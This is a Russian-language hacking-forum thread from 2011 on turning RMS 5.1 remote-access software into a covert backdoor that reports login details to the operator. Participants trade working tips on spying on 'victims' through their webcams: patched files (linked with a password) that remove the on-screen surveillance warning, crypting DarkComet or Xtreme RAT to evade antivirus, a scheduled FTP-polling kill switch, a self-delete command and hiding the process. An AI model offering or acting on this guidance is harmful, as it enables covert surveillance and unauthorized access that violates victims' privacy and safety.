RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. aigera
    aigera Новичок
    Симпатии:
    3
    у меня тоже патченные файлы для камер ниче не показывает((((

31 окт 2011
  2. TDI
    TDI Новичок
    Симпатии:
    32
    интересно спросить, а где ты их взял?

1 ноя 2011
  3. vlader
    vlader Guest
    ну дак их где то на 19 странице в другой теме выкладовали.

4 ноя 2011
  4. TDI
    TDI Новичок
    Симпатии:
    32
    ну так в другой теме и другая версия программы, знач она на 5.1 и не будет пахать

4 ноя 2011
  5. vlader
    vlader Guest
    нет. Должна пахать. Только если файлы сменить, то это будет версия программы 5.0

4 ноя 2011
  6. TDI
    TDI Новичок
    Симпатии:
    32
    тогда почему не пашет? :)

4 ноя 2011
  7. sawyer1992
    sawyer1992 Новичок
    Симпатии:
    6
    товарищи, если у вас не работает вебкамера или выскакивает баннер и вам прям так хочется "поподглядывать" =/ - потрудитесь ручками и закиньте отдельно программу для просмотра вебки, та даже в сборку можете это включить + в батник две строчки от силы. Проявляйте хоть иногда сообразительность!

5 ноя 2011
  8. vlader
    vlader Guest
    sawyer1992,
    Я то понимаю, что так намного проще, но из программ для просмотра вебки знаю только RemCam, на который вижжит всё.

5 ноя 2011
  9. sawyer1992
    sawyer1992 Новичок
    Симпатии:
    6
    а если взять например ДаркКомет или тот же Экстрим РАТ, закриптовать их хорошенько и залить через рмс? в них обоих есть просмотр через вебку.

5 ноя 2011
  10. vlader
    vlader Guest
    Я в закриптовке не силён.

5 ноя 2011
  11. andersen62
    andersen62 Новичок
    Симпатии:
    7
    у меня возник вопрос, а как прописать в bat файле, который добавляет в шедуллер виндовс, время удаления РМС. Ну например мне жертва не нужна 12.11.2011 и он автоматом удаляется?

5 ноя 2011
  12. sawyer1992
    sawyer1992 Новичок
    Симпатии:
    6
    вот простой интересный пример: зашедуль постоянно скачивать с фтп какой-то файл размером в 1кб., и после этого идет проверка на наличие этого файла, после этого идет удаление этого файла и так снова.
    если проверка прошла успешно тогда не самоудаляемся, ты в любой момент заходишь на фтп серв и удаляешь тот файл, в итоге проверку не проходим и выполняем команду самоудаление. Тут миллион вариантов ;)
    А вообще для такого случая я в свою сборку включил файл de.exe который все удаляет.
    Для этого, напомню, заходишь в консоль жертвы и прописываешь %windir%\system32\de.exe

5 ноя 2011
  13. andersen62
    andersen62 Новичок
    Симпатии:
    7
    Алекс?

5 ноя 2011
  14. zaratrem
    zaratrem Новичок
    Симпатии:
    0
    Вот готовые файлы под эту сборку (убирают сообщение о видео наблюдении, на машине жертвы)
    http://www.megaupload.com/?d=WJME7RQG
    пароль: rcvb34957asfhre2s
    Проверял на виртуалке, всё чисто, никаких банеров, правда задержка колоссальная была, но скорее всего причина в медленном интернете.

Последнее редактирование: 5 ноя 2011
    5 ноя 2011
  15. andersen62
    andersen62 Новичок
    Симпатии:
    7
    ты бы написал, что это пропатченые файлы для снятия банера под камеру! Кстати, под новую бетку патчик есть?

5 ноя 2011
  16. zaratrem
    zaratrem Новичок
    Симпатии:
    0
    Поправил.
    Под третью бету пока ничего не находил, да и смысл, чем она лучше этой версии? я пока что всем доволен.
    p.s. кстати рекомендую при "видео просмотре" ставить минимальное качество, и как только будет нормальный видео захват, повышать до оптимального уровня. (звук кстати в этой проге тоже как то не сразу захватывает, но в отличии от "задних дверей" её не надо криптовать, так что грех жаловаться).

5 ноя 2011
  17. andersen62
    andersen62 Новичок
    Симпатии:
    7
    еще о мелочах:
    - на нетбуках появляются тормоза у жертв
    - на некоторых камерах при подключении загораются светодиоды
    - торможение при передачи данных от реального приблизительно 1-2 сек.

так что будьте аккуратнее.

остался один открытый вопрос у меня, как проинжектить или скрыть процесс?

6 ноя 2011
  18. крах
    крах Новичок
    Симпатии:
    14
    А как ты поменял эти файлы в этой сборке?Как вскрыл msi файл?Или по другому?Плиз опиши добавлю на главную страницу...

6 ноя 2011
  19. vlader
    vlader Guest
    Дак он видемо никак ни менял.

6 ноя 2011
  20. zaratrem
    zaratrem Новичок
    Симпатии:
    0
    В сборке я их не менял, я просто заменил их на машине жертвы, только на прямую заменить не получится, сперва надо переименовать заменяемые файлы на машине жертвы, далее перекинуть ей патченые, и перезагрузить программу (я перезагружал саму машину). Всё теперь сервер запускается с патчеными файлами, а старые переименованные можно удалить.

6 ноя 2011
Статус темы:
Закрыта.
Загрузка...